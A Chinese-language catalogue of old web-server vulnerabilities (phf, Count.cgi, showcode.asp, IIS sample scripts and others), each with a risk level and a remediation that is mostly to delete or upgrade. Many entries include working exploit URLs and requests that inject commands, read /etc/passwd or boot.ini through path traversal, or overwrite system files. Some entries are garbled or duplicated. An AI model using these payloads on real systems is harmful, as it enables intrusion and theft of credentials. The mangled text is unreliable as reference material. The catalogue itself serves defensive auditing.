#如有任何安全組織或個人愿意無嘗對此文進行長期的、不間斷地維護、
更新或更改。請自行隨便,不必與我商討.但要求是成果必須完全地向
internet公開。任何行為的私藏都是不受歡迎的。
#本文歡迎轉摘.但請保持這些聲明。
#如有任何問題或建議,請mailto:iwillsurewin@163.net
################################################################
類型:攻擊型
名字:phf
風險等級:中
描述:在NCSA或者Apache(1.1.1版本以內)非商業版本的WebServer中
有一段程序util.c,允許黑客以root身份執行任何一個指令:
http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here
建議:無
解決方法:把Apachewebserver升級到1.1.1以上,或者將NCSAwebserver
升級到最新版本
類型:攻擊型
名字:wguset.exe
風險等級:中
描述:如果您使用NT做為您的WebServer的操作系統,而且wguest.exe存
在于您的Web可執行目錄中的話,入侵者將能利用它閱讀到您的硬
盤上所有USR_用戶能閱讀的文件
建議:將wguset.exe從你的Web目錄移走或刪除
解決方法:將wguset.exe從你的Web目錄移走或刪除
類型:攻擊型
名字:rguset.exe
風險等級:中
描述:如果您使用NT做為您的WebServer的操作系統,而且rguest.exe存
在于您的Web可執行目錄中的話,入侵者將能利用它閱讀到您的硬
盤上所有USR_用戶能閱讀的文件
建議:將rguset.exe從你的Web目錄移走或刪除
解決方法:將rguset.exe從你的Web目錄移走或刪除
類型:攻擊型
名字:perl.exe
風險等級:低
描述:在cgi-bin執行目錄下存在perl.exe,這屬于嚴重的配置錯誤。黑客
可以在perl.exe后面加一串指令,利用瀏覽器在server上執行任何
腳本程序
建議:perl.exe是放在任何帶執行權限的web目錄下都是不安全的
解決方法:在web目錄下移除perl.exe這個程序.
類型:攻擊型
名字:shtml.exe
風險等級:低
描述:如果您使用FrontPage作為您的WebServer,那么入侵者能夠利用
IUSR_用戶和shtml.exe入侵您的機器,做您不希望的事
建議:將shtml.exe從你的Web目錄移走或刪除
解決方法:將shtml.exe從你的Web目錄移走或刪除
類型:攻擊型
名字:wwwboard.pl
風險等級:低
描述:wwwboard.pl程序容易引起攻擊者對服務器進行D.O.S攻擊
建議:如無必要可以刪除該文件
解決方法:對get_variables的子程序中的下面這段:
if($FORM{'followup'}){$followup="1";
@followup_num=split(/,/,$FORM{'followup'});
$num_followups=@followups=@followup_num;
$last_message=pop(@followups);
$origdate="$FORM{'origdate'}";
$origname="$FORM{'origname'}";
$origsubject="$FORM{'origsubject'}";}
替換為:
if($FORM{'followup'}){
$followup="1";
@followup_num=split(/,/,$FORM{'followup'});
$num_followups=@followups=@followup_num;
$last_message=pop(@followups);
$origdate="$FORM{'origdate'}";
$origname="$FORM{'origname'}";
$origsubject="$FORM{'origsubject'}";
#WWWBoardBombPatch
#WrittenBy:SamuelSparlingsparling@slip.net)
$fn=0;
while($fn<$num_followups)
{
$cur_fup=@followups$fn];
$dfn=0;
foreach$fm(@followups)
{
if(@followups[$dfn]==@followups[$fn]&&$dfn!=$fn)
{
&error(board_bomb);
}
$dfn++;
}
$fn++;
}
#EndWWWBoardBombPatch
}
類型:攻擊型
名字:uploader.exe
風險等級:中
描述:如果您使用NT作為您的WebServer的操作系統,入侵者能夠利用
uploader.exe上傳任何文件
建議:將uploader.exe從你的Web目錄移走或刪除
解決方法:將uploader.exe從你的Web目錄移走或刪除
類型:攻擊型
名字:bdir.htr
風險等級:高
描述:如果您使用NT做為您的WebServer的操作系統,而且bdir.htr存在
于您的Web可執行目錄中的話,入侵者將能利用它在您的服務器上
無止境的創建ODBC數據庫,并生成一些可執行的文件。
建議:將bdir.htr從你的Web目錄移走或刪除
解決方法:將bdir.htr從你的Web目錄移走或刪除
類型:攻擊型
名字:Count.cgi
風險等級:高
描述:在/cgi-bin目錄下的Count.cgi程序(wwwcount2.3版本)有一個溢出
錯誤,允許入侵者無須登錄而遠程執行任何指令。
建議:如無必要可以刪除該文件
解決方法:將wwwcount升級到2.4或者以上
類型:攻擊型
名字:test-cgi
風險等級:高
描述:test-cgi這個文件可以被入侵者用來瀏覽服務器上的重要信息
建議:建議審核cgi-bin目錄下的執行程序,嚴格控制訪問權限
解決方法:刪除test-cgi文件
類型:攻擊型
名字:nph-test-cgi
風險等級:高
描述:nph-test-cgi這個文件可以被入侵者用來瀏覽服務器上的重要信息
建議:建議審核cgi-bin目錄下的執行程序,嚴格控制訪問權限
解決方法:刪除nph-test-cgi文件
類型:攻擊型
名字:php.cgi
風險等級:低
描述:php.cgi程序有較多的漏洞,包括緩存溢出漏洞,還有導致任何系
統文件可以被入侵者讀取的漏洞
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除php.cgi程序是最好的辦法
類型:攻擊型
名字:handler
風險等級:低
描述:IRIX5.3,6.2,6.3,6.4的/cgi-bin/handler程序存在緩存溢出
錯誤,允許入侵者在server上遠程執行一段程序:
telnettarget.machine.com80
GET/cgi-bin/handler/whatever;cat/etc/passwd|?data=Download
HTTP/1.0
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除handler文件
類型:攻擊型
名字:webgais
風險等級:高
描述:/cgi-bin,目錄下的webgais是GAIS搜索工具的一個接口,它有一個
毛病使入侵者可以繞過程序的安全機制,執行系統命令:
POST/cgi-bin/webgaisHTTP/1.0
Content-length:85(replacethiswiththeactuallengthof
the"exploit"line)
telnettarget.machine.com80query=';mail+you\@your.host
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除webgais文件
類型:攻擊型
名字:websendmail
風險等級:高
描述:/cgin-bin目錄下的websendmail程序允許入侵者執行一個系統指令:
telnettarget.machine.com80
POST/cgi-bin/websendmailHTTP/1.0
Content-length:xxx(shouldbereplacedwiththeactual
lengthofthestringpassedtotheserver,inthiscase
xxx=90) receiver=;mail+your_address\@somewhere.org
&content=a
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:高級用戶:編輯websendmail腳本,過濾特殊字符
一般用戶:刪除websendmail文件
類型:攻擊型
名字:webdist.cgi
風險等級:高
描述:對于Irix6.2和6.3平臺,/cgi-bin目錄下的webdist.cgi有一個弱點
允許入侵者無須登錄而在系統上執行任何指令:
http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/var/www/cgi-bin/webdist.cgi目錄下的webdist.cgi
類型:攻擊型
名字:faxsurvey
風險等級:高
描述:在LinuxS.u.S.E上/cgi-bin目錄下的faxsurvey程序允許入侵者無
須登錄就能在服務器執行指令:http://joepc.linux.elsewhere.org/
cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin/faxsurvey文件
類型:攻擊型
名字:htmlscript
風險等級:中
描述:安裝了htmlscript2.99x或者更早版本的服務器,存在一個毛病使
入侵者可以查看服務器上的任何文件:
http://www.vulnerable.server.com/cgi-bin/htmlscript?../../
../../etc/passwd
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin/htmlscript腳本文件,或者將htmlscript升級到
3.0以上
類型:攻擊型
名字:pfdisplay
風險等級:中
描述:在Irix6.4或者更早版本的web服務器上,/cgi-bin/pfdisplay程序
允許入侵者非法查看服務器上的文件
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin/pfdisplay文件,或者打補丁,補丁可以去
sgigate.sgi.com(204.94.209.1)或者ftp.sgi.com下載:
Filename:README.patch.3018
Algorithm#1(sum-r):3795511README.patch.3018
Algorithm#2(sum):1545511README.patch.3018
MD5checksum:1169EB51D75E0794C64C2C1FD6211B69
Filename:patchSG0003018
Algorithm#1(sum-r):016792patchSG0003018
Algorithm#2(sum):128762patchSG0003018
MD5checksum:BD16A53A0AE693D6E9E276EE066BDBC8
Filename:patchSG0003018.idb
Algorithm#1(sum-r):013392patchSG0003018.idb
Algorithm#2(sum):2512patchSG0003018.idb
MD5checksum:1CB16E6A8C50BF17CD02A29C2E4D35EB
Filename:patchSG0003018.performer_tools_man
Algorithm#1(sum-r):102018patchSG0003018.per-
-former_tools_man
Algorithm#2(sum):31448patchSG0003018.performer_t-
-ools_man
MD5checksum:B6B3D90FAB9B5A342397C3E5AF5A8D29
Filename:patchSG0003018.performer_tools_sw
Algorithm#1(sum-r):4847418patchSG0003018.perform-
-er_tools_sw
Algorithm#2(sum):2817618patchSG0003018.performer_
tools_sw
MD5checksum:DF4E8ED8326A6A0B39F7B4D67E5FD71F
類型:攻擊型
名字:www-sql
風險等級:中
描述:www-sql存在于/cgi-bin/目錄下,這將導致入侵可以越權訪問被保
護的文件
建議:最好刪除www-sql文件
解決方法:#ifPHPFASTCGI
while(FCGI_Accept()>=0)
{
#endif
s=getenv("REDIRECT_STATUS");
if(!s){
puts("Content-type:text/plain\r\n\r\nPHP/FIdetected
aninternalerror.Pleaseinformsa@hogia.netofwhat
youjustdid.\n");
exit(1);
}
s=getenv("PATH_TRANSLATED");
類型:攻擊型
名字:view-source
風險等級:高
描述:在cgi-bin目錄下的view-source程序沒有對輸入進行安全檢查,使
入侵者可以查看服務器上的任何文件
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin目錄下的viewsource程序
類型:攻擊型
名字:campas
風險等級:高
描述:在cgi-bin目錄下的campas程序有一個毛病可以使入侵者隨意查看
server上的重要文件:
telnetwww.xxxx.net80
Trying200.xx.xx.xx...
Connectedtovenus.xxxx.net
Escapecharacteris'^]'.
GET/cgi-bin/campas?%0acat%0a/etc/passwd%0a
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin目錄下的campas程序
類型:攻擊型
名字:aglimpse
風險等級:高
描述:在cgi-bin目錄下的aglimpse程序有一個毛病可以使入侵者無須登
錄而隨意執行任何指令
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin目錄下的aglimpse程序
類型:攻擊型
名字:AT-admin.cgi
風險等級:中
描述:在ExciteforWebServers1.1上的/cgi-bin/AT-admin.cgi程序,允
許普通用戶完全控制整個系統
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin目錄下的AT-admin.cgi程序
類型:攻擊型
名字:finger
風險等級:中
描述:這個位于/cgi-bin下的finger程序,可以查看其它服務器的信息,
但是如果將參數改成本機,本機上的帳號信息將暴露無遺:
/cgi-bin/finger?@localhost
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin目錄下的finger程序
類型:攻擊型
名字:webwho.pl
風險等級:中
描述:如果在您的Web可執行目錄中有webwho.pl這個CGI腳本,那么入侵
者將能利用他閱讀啟動Web的用戶能讀寫執行的任何文件。
建議:將webwho.pl從您的Web目錄中刪除或移走
解決方法:將webwho.pl從您的Web目錄中刪除或移走
類型:攻擊型
名字:w3-msql
風險等級:低
描述:MiniSQL軟件包發行版本附帶的一個CGI(w3-msql)可被用于以
httpd的uid權限執行任意代碼。這個安全漏洞是由程序中的scanf()
函數引起的。
建議:如果您安裝了MiniSQL軟件包,請您將/cgi-bin/目錄下的w3-msql文
件刪除或移走
解決方法:如果您安裝了MiniSQL軟件包,請您將/cgi-bin/目錄下的w3-msql
文件刪除或移走.或使用以下補丁。
補。
------w3-msql.patch---------
410c410
scanf("%s",boundary); <br>---
<scanf("%128s",boundary);>
418c418
<strcat(var,buffer);
<strncat(var,buffer,sizeof(buffer));
428c428
<scanf("Content-Type:%s",buffer);>
<scanf("Content-Type:%15360s",buffer);>
------w3-msql.patch---------
類型:攻擊型
名字:NetscapeFastTrackserver2.0.1a
風險等級:中
描述:UnixWare7.1附帶的NetscapeFastTrackserver2.0.1a存在一個遠程
緩沖區溢出漏洞。缺省地,監聽457端口的httpd通過http協議提供
UnixWare文檔。如果向該服務器傳送一個長度超過367字符的GET請
求,會使緩沖區溢出,EIP值被覆蓋將可能導致任意代碼以httpd權
限執行。
建議:臨時解決方法是關閉NetscapeFastTrack服務器
解決方法:臨時解決方法是關閉NetscapeFastTrack服務器。
類型:攻擊型
名字:AnyForm.cgi
風險等級:高
描述:位于cgi-bin目錄下的AnyForm.cgi程序,是用于簡單表單通過郵件
傳遞響應的,但該程序對用戶輸入檢查不徹底,可被入侵者利用,
在server上執行任何指令.
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:建議升級該cgi程序,或者刪除該文件
類型:攻擊型
名字:whois.cgi
風險等級:低
描述:在多個WebServer中帶有的Whois.cgi存在溢出漏洞。它們包括:
WhoisInternicLookup-version:1.02
CCWhois-Version:1.0
Matt'sWhois-Version:1
他們將使入侵者能夠在您的系統上使用啟動httpd用戶的權限執行任
意的代碼
建議:將在您Web目錄中問whois.cgi刪除或移走
解決方法:將在您Web目錄中問whois.cgi刪除或移走
類型:攻擊型
名字:environ.cgi
風險等級:中
描述:在Apachewebserver或者IIS等其它webserver的/cgi-bin/environ.cgi
程序,有一個毛病允許入侵者繞過安全機制,瀏覽服務器上的一些
文件。
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:建議升級該cgi程序,或者刪除該文件
類型:攻擊型
名字:wrap
風險等級:中
描述:/cgi-bin/wrap程序有兩個漏洞,均允許入侵者獲取服務器上文件
的非法訪問,如:
http://host/cgi-bin/wrap?/../../../../../etc
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin/wrap文件
類型:攻擊型
名字:edit.pl
風險等級:中
描述:/cgi-bin/edit.pl有一個安全弱點,用下面這條命令就可以訪問用
戶的配置情況:
http://www.sitetracker.com/cgi-bin/edit.pl?account=&password=
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin/edit.pl文件
類型:攻擊型
名字:service.pwd
風險等級:中
描述:UNix系統的http://www.hostname.com/_vti_pvt/service.pwd可讀,
將暴露用戶密碼信息
建議:建議刪除
解決方法:chownrootservice.pwd chmod700service.pwd
類型:攻擊型
名字:administrators.pwd
風險等級:中
描述:UNix系統的http://www.hostname.com/_vti_pvt/administrators.pwd
可讀,將暴露用戶密碼信息
建議:建議刪除
解決方法:chownrootadministrators.pwd chmod700administrators.pwd
相關連接:
類型:攻擊型
名字:users.pwd
風險等級:中
描述:UNix系統的http://www.hostname.com/_vti_pvt/users.pwd可讀,
將暴露用戶密碼信息
建議:建議刪除
解決方法:chownrootusers.pwd chmod700users.pwd
類型:攻擊型
名字:authors.pwd
風險等級:中
描述:UNix系統的http://www.hostname.com/_vti_pvt/authors.pwd可讀,
將暴露用戶密碼信息
建議:建議刪除
解決方法:chownrootauthors.pwd chmod700authors.pwd
類型:攻擊型
名字:visadmin.exe
風險等級:中
描述:在OmniHTTPdWebServer的cgi-bin目錄下存在這個文件visadmin.exe,
那么攻擊者只要輸入下面的命令:
http://omni.server/cgi-bin/visadmin.exe?user=guest數分鐘之
后服務器的硬盤將會被撐滿
建議:建議刪除
解決方法:把visadmin.exe從cgi-bin目錄中刪除
類型:攻擊型
名字:get32.exe
風險等級:高
描述:Alibaba的webserver,其cgi-bin目錄存在get32.exe這個程序,允
許入侵者任意執行一條指令:
http://www.victim.com/cgi-bin/get32.exe|echo%20>c:\command.com
建議:建議刪除
解決方法:把GET32.exe從cgi-bin目錄中刪除
類型:攻擊型
名字:alibaba.pl
風險等級:高
描述:Alibaba的webserver,其cgi-bin目錄存在alibaba.pl這個程序,允
許入侵者任意執行一條指令:
http://www.victim.com/cgi-bin/alibaba.pl|dir
建議:建議刪除
解決方法:把alibaba.pl從cgi-bin目錄中刪除
類型:攻擊型
名字:tst.bat
風險等級:高
描述:Alibaba的webserver,其cgi-bin目錄存在tst.bat這個程序,允許
入侵者任意執行一條指令:
http://www.victim.com/cgi-bin/tst.bat|type%20c:\windows\win.ini
建議:建議刪除
解決方法:把tst.bat從cgi-bin目錄中刪除
類型:攻擊型
名字:fpcount.exe
風險等級:低
描述:如果您使用NT作為您的WebServer的操作平臺,并只安裝了SP3補丁,
那么入侵者能利用這個CGI程序進行DoS攻擊,使您的IIS服務拒絕
訪問。
建議:將在您Web目錄中的fpcount.exe刪除或移走
解決方法:將在您Web目錄中的fpcount.exe刪除或移走
類型:攻擊型
名字:openfile.cfm
風險等級:低
描述:如果在您的Web目錄中含有
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/exampleapp/publish/admin/addcontent.cfm
這些文件,那么入侵者可能能夠利用它們讀到您系統上的所有文件
建議:將在您Web目錄中的openfile.cfm刪除或移走
解決方法:將在您Web目錄中的openfile.cfm刪除或移走
名字:exprcalc.cfm
風險等級:低
描述:如果在您的Web目錄中含有
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/exampleapp/publish/admin/addcontent.cfm
這些文件,那么入侵者可能能夠利用它們讀到您系統上的所有文件
建議:將在您Web目錄中的exprcalc.cfm刪除或移走
解決方法:將在您Web目錄中的exprcalc.cfm刪除或移走
相關連接:http://www.allaire.com/handlers/index.cfm?ID=8727&Method=Full
類型:攻擊型
名字:displayopenedfile.cfm
風險等級:低
描述:如果在您的Web目錄中含有
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/exampleapp/publish/admin/addcontent.cfm
這些文件,那么入侵者可能能夠利用它們讀到您系統上的所有文件
建議:將在您Web目錄中的displayopenedfile.cfm刪除或移走
解決方法:將在您Web目錄中的displayopenedfile.cfm刪除或移走
類型:攻擊型
名字:sendmail.cfm
風險等級:中
描述:將在您Web目錄中的openfile.cfm刪除或移走
在多個WebServer中帶有的Whois.cgi存在溢出漏洞。它們包括:
WhoisInternicLookup-version:1.02
CCWhois-Version:1.0
Matt'sWhois-Version:1
他們將使入侵者
能夠在您的系統上使用啟動httpd用戶的權限執行任意的代碼
如果在您的Web目錄中含有
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/exampleapp/publish/admin/addcontent.cfm
這些文件,那么入侵者可能能夠利用它們讀到您系統上的所有文件
建議:將在您Web目錄中的sendmail.cfm刪除或移走
解決方法:將在您Web目錄中的sendmail.cfm刪除或移走
類型:攻擊型
名字:codebrws.asp
風險等級:中
描述:如果您使用NT+IIS作為您的WebServer的情況下,入侵者能夠利用
這個ASP查看您系統上所有啟動httpd用戶有權限閱讀的文件請前往
以下地址查詢補丁InternetInformationServer:
ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/
Viewcode-fix/
SiteServer:
ftp://ftp.microsoft.com/bussys/sitesrv/sitesrv-public/fixes/
usa/siteserver3/hotfixes-postsp2/Viewcode-fix/
http://www.microsoft.com/security/products/iis/checklist.asp
建議:將在您Web目錄中的codebrws.asp刪除或移走
解決方法:將在您Web目錄中的codebrws.asp刪除或移走
類型:信息型
名字:codebrws.asp_1
風險等級:中
描述:在/iissamples/exair/howitworks/下面存在codebrws.asp文件,
用下面的路徑:
http://www.xxx.com/iissamples/exair/howitworks/codebrws.asp?
source=/index.asp就可以查看到index.asp的源碼。實際上任何
ascii文件都可以瀏覽。
建議:刪除名叫/iissamples/的web目錄
解決方法:將在您Web目錄中的codebrws.asp刪除或移走
請前往以下地址查詢補丁
InternetInformationServer:
ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/
SiteServer:
ftp://ftp.microsoft.com/bussys/sitesrv/sitesrv-public/fixes/usa/
siteserver3/hotfixes-postsp2/Viewcode-fix/
http://www.microsoft.com/security/products/iis/checklist.asp
相關連接:ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/
usa/Viewcode-fix/
類型:攻擊型
名字:showcode.asp_1
風險等級:中
描述:在/msads/Samples/SELECTOR/目錄下存在showcode.asp文件,用下
面的路徑:
http://www.xxx.com/msadc/Samples/SELECTOR/showcode.asp?source=/
msadc/Samples/../../../../../boot.ini
可以查到boot.ini文件的內容;實際上入侵者能夠利用這個ASP查看您
系統上所有啟動httpd用戶有權限閱讀的文件
建議:禁止對/msads目錄的匿名訪問
解決方法:將在您Web目錄中的showcode.asp刪除或移走
請前往以下地址查詢補丁
InternetInformationServer:
ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/
Viewcode-fix/
SiteServer:
ftp://ftp.microsoft.com/bussys/sitesrv/sitesrv-public/fixes/usa/
siteserver3/hotfixes-postsp2/Viewcode-fix/
http://www.microsoft.com/security/products/iis/checklist.asp
相關連接:ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/
usa/Viewcode-fix/
類型:攻擊型
名字:/msadc目錄可以訪問
風險等級:中
描述:WindowsNTIISserver下的/msadc目錄可以訪問,會造成一系列安全
問題,包括被入侵者非法調用應用程序
建議:建議刪除不必要的由IIS缺省安裝形成的目錄
解決方法:禁止/msadc目錄,如果必須打開該目錄,至少應該設置成合法
用戶需要密碼才能訪問
類型:攻擊型
名字:search97.vts
風險等級:中
描述:這個文件將能使入侵者任意的讀取你系統中啟動httpd用戶能讀取
的文件
建議:將在您Web目錄中的search97.vts刪除或移走
解決方法:將在您Web目錄中的search97.vts刪除或移走,或前往以下地址
下載Patch
https://customers.verity.com/products/server/310/
patches/
類型:攻擊型
名字:carbo.dll
風險等級:低
描述:如果您安裝了SystemsrunningiCatSuiteversion3.0,那么它將自
動在你的系統上添加一個叫carbo.dll的文件,而入侵者將能利用
這個文件訪問您系統上的熱和文件
建議:將在您Web目錄中的openfile.cfm刪除或移走
解決方法:將在您Web目錄中的openfile.cfm刪除或移走
類型:攻擊型
名字:whois_raw.cgi
風險等級:低
描述:因為whois_raw.cgi作者的失誤,這個CGI將使入侵者能夠以您系統
上啟動httpd的用戶的權限執行您系統上任意的程序
建議:將在您Web目錄中的whois_raw.cgi刪除或移走
解決方法:將在您Web目錄中的whois_raw.cgi刪除或移走
類型:攻擊型
名字:doc
風險等級:低
描述:您的Web目錄可以文件列表,這將幫助入侵者分析您的系統信息
建議:將您的所有Web目錄設置為不能文件列表
解決方法:將您的所有Web目錄設置為不能文件列表
類型:攻擊型
名字:.html/............./config.sys
風險等級:低
描述:如果您使用的是較久版本的ICQ,那么入侵者能夠利用它閱讀您機
器上的所有文件
建議:下載新版本的ICQ
解決方法:請前往以下地址下載新版本的ICQ
類型:攻擊型
名字:....../
風險等級:中
描述:您使用的WebServer軟件能使入侵者閱讀您系統上的所有文件
建議:更換或升級您的WebServer軟件
解決方法:更換或升級您的WebServer軟件
類型:攻擊型
名字:no-such-file.pl
風險等級:低
描述:由于您的WebServer軟件的缺陷,使得入侵者能夠利用不存在的CGI
腳本請求來分析您的站點的目錄結構
建議:升級您的WebServer軟件
解決方法:升級您的WebServer軟件
類型:攻擊型
名字:_vti_bin/shtml.dll
風險等級:低
描述:入侵者利用這個文件將能使您的系統的CPU占用率達到100%
建議:將_vti_bin/shtml.dll從您的Web目錄刪除或移走
解決方法:將_vti_bin/shtml.dll從您的Web目錄刪除或移走
類型:信息型
名字:nph-publish
風險等級:中
描述:在/cgi-bin目錄下存在nph-publish文件,這使入侵者能通過www瀏
覽服務器上的任何文件
建議:建議審查/cgi-bin目錄,刪除不必要的cgi程序
解決方法:刪除nph-publish文件
類型:信息型
名字:showcode.asp
風險等級:中
描述:在/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Sampl
es/SELECTOR/目錄下存在showcode.asp文件可以被入侵者利用來查
看服務器上的文件內容
建議:最好禁止/msadc這個web目錄的匿名訪問,建議刪除這個web目錄
解決方法:刪除showcode.asp文件
類型:信息型
名字:_vti_inf.html
風險等級:中
描述:web根目錄下存在_vti_inf.html文件,該文件是Frontpageexten-
-tionserver的特征,包含了一系列FrontpageExtentionServer的重
要信息;而且FrontpageExtentionserver是一個有很多漏洞的web
服務,用它入侵者可能直接修改首頁文件。
建議:用ftp等其它方式上載網頁文件
解決方法:卸載FrontpageExtentionServer
類型:信息型
名字:index.asp::$DATA
風險等級:中
描述:asp程序的源代碼可以被后綴+::$DATA的方法查看到,這樣入侵者可
以設法查到服務器數據庫密碼等重要信息
建議:建議留意微軟最新關于codeview的補丁和安全公告
解決方法:安裝servicespack6或者打補丁:
ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/chs/security/
fesrc-fix/
相關連接:ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/
chs/security/fesrc-fix/
類型:攻擊型
名字:main.asp%81
風險等級:低
描述:asp程序的源代碼可以被后綴+%81的方法查看到,這樣入侵者可以設
法查到服務器數據庫密碼等重要信息
建議:建議留意微軟最新關于codeview的補丁和安全公告
解決方法:安裝servicespack6或者打補丁:
ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/chs/security
/fesrc-fix/
相關連接:ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/
chs/security/fesrc-fix/
類型:信息型
名字:showcode.asp_2
風險等級:中
描述:在/msadc/Samples/SELECTOR/目錄下存在showcode.asp文件,用下
面的路徑:http://www.xxx.com/msadc/Samples/SELECTOR/showcode.
asp?source=/msadc/Samples/../../../../../boot.ini可以查到
boot.ini文件的內容;實際上入侵者能夠利用這個ASP查看您系統上
所有啟動httpd用戶有權限閱讀的文件
建議:禁止對/msadc目錄的匿名訪問
解決方法:將在您Web目錄中的showcode.asp刪除或移走
請前往以下地址查詢補丁
InternetInformationServer:ftp://ftp.microsoft.com/bussys/iis/iis
-public/fixes/usa/Viewcode-fix/
SiteServer:
ftp://ftp.microsoft.com/bussys/sitesrv/sitesrv-public/fixes/usa/
siteserver3/hotfixes-postsp2/Viewcode-fix/
http://www.microsoft.com/security/products/iis/checklist.asp
相關連接:ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/
usa/Viewcode-fix/
類型:攻擊型
名字:ism.dll
風險等級:高
描述:在/scripts/iisadmin/目錄下存在ism.dll文件,這個文件有一個溢
出錯誤,允許入侵者在服務器上執行任意一段程序;另外。攻擊者
還隨時可以令服務器的www服務死掉
建議:禁止對/scripts目錄的匿名訪問
解決方法:刪除/scripts/iisadmin/ism.dll,或者打開iis的管理控制臺,
選取默認web站點,點右鍵,選取屬性,點:"主目錄",在起始
點那行點"配置"按鈕,將".htr"的應用程序映射項刪除
類型:信息型
名字:codebrws.asp_2
風險等級:中
描述:在/iissamples/sdk/asp/docs/下面存在codebrws.asp文件,用下面
的路徑:http://www.xxx.com/iissamples/exair/howitworks/code
brws.asp?source=/index.asp就可以查看到index.asp的源碼。實
際上任何ascii文件都可以瀏覽。
建議:刪除名叫/iissamples/的web目錄
解決方法:將在您Web目錄中的codebrws.asp刪除或移走
請前往以下地址查詢補丁
InternetInformationServer:
ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/
SiteServer:
ftp://ftp.microsoft.com/bussys/sitesrv/sitesrv-public/fixes/usa/
siteserver3/hotfixes-postsp2/Viewcode-fix/
http://www.microsoft.com/security/products/iis/checklist.asp
相關連接:ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/
usa/Viewcode-fix/
類型:攻擊型
名字:uploadn.asp
風險等級:高
描述:在/scripts/tools目錄下存在uploadn.asp程序,只要入侵者有一個
可用帳號,哪怕是Guest帳號,就可以上傳任何文件到你的web目錄,
除了替換主頁外,他更可以進一步控制你的整個系統!
建議:刪除名為/scripts的web目錄
解決方法:刪除uploadn.asp文件
相關連接:
類型:攻擊型
名字:uploadx.asp
風險等級:高
描述:在/scripts/tools目錄下存在uploadx.asp程序,只要入侵者有一個
可用帳號,哪怕是Guest帳號,就可以上傳任何文件到你的web目錄,
除了替換主頁外,他更可以進一步控制你的整個系統!
建議:刪除名為/scripts的web目錄
解決方法:刪除uploadx.asp文件
相關連接:
類型:攻擊型
名字:query.asp
風險等級:低
描述:在/IISSAMPLES/ExAir/Search/的目錄下存在query.asp文件,這個
文件有個漏洞如果被攻擊者利用,后果將導致CPU使用率達到100%,
機器速度將明顯變慢
建議:禁止對/iissamples目錄的存取
解決方法:刪除query.asp文件
71
類型:攻擊型
名字:advsearch.asp
風險等級:低
描述:在/IISSAMPLES/ExAir/Search/的目錄下存在query.asp文件,這個
文件有個漏洞如果被攻擊者利用,后果將導致CPU使用率達到100%,
機器速度將明顯變慢
建議:禁止對/iissamples目錄的存取
解決方法:刪除advsearch.asp文件
類型:攻擊型
名字:search.asp
風險等級:低
描述:在/IISSAMPLES/ExAir/Search/的目錄下存在search.asp文件,這個
文件有個漏洞如果被攻擊者利用,后果將導致CPU使用率達到100%,
機器速度將明顯變慢
建議:禁止對/iissamples目錄的存取
解決方法:刪除search.asp文件
類型:攻擊型
名字:getdrvrs.exe
風險等級:中
描述:這個存在于/scripts/tools目錄下的getdrvrs.exe文件允許任何一
個用戶在web根目錄下創建任何文件,和創建ODBC數據源
建議:禁止對/scripts/tools目錄的匿名訪問
解決方法:刪除getdrvrs.exe文件
類型:攻擊型
名字:newdsn.exe
風險等級:中
描述:這個存在于/scripts/tools目錄下的newdsn.exe文件允許任何一個
用戶在web根目錄下創建任何文件,如:
http://xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?driver=Microsoft
%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Evil2+samples+from+microsoft
